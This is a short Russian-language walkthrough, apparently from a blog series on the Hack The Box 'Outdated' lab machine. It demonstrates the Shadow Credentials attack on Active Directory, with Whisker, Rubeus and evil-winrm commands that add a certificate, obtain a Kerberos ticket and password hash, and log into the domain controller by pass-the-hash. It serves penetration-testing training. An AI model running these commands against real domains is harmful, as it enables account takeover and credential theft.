В предыдущей статье, в рамках прохождения Hack The Box Outdated, мы познакомились с инструментом BloodHound. Сегодня продолжим и рассмотрим атаку Shadow Credentials.
Еще по теме: Защита от обнаружения при атаке на Active Directory
Атака Shadow Credentials при прохождении HTB Outdated
Эта техника позволяет атакующему завладеть учетной записью пользователя или компьютера, если он может изменить атрибут msDS-KeyCredentialLink целевого объекта и добавить к нему альтернативные учетные данные, такие как сертификат. Сделать это можно с помощью утилиты Whisker.
1 |
dotnet inline-execute /home/ralf/tools/SHARP/CredAccess/Whisker.exe add /target:sflowers |
Сертификат добавлен, пароль показан, но также показана и следующая команда, которой мы запросим тикет и хеш пароля пользователя.
1 |
dotnet inline-execute /home/ralf/tools/SHARP/CredAccess/Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIB...dNldA/o3dwICB9A= /password:"C9pt7Aokq2cmfYxq" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show |
С полученным хешем можно авторизоваться через службу WinRM и запустить новый демон Havoc.
1 |
evil-winrm -i dc.outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5 |
В следующей статье продолжим прохождение HTB Outdated и рассмотрим инструмент SharpWSUS для создания вредоносного обновления Windows.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Пентест Active Directory на машине HTB Intelligence
- Как обойти PowerShell AMSI при атаке на Active Directory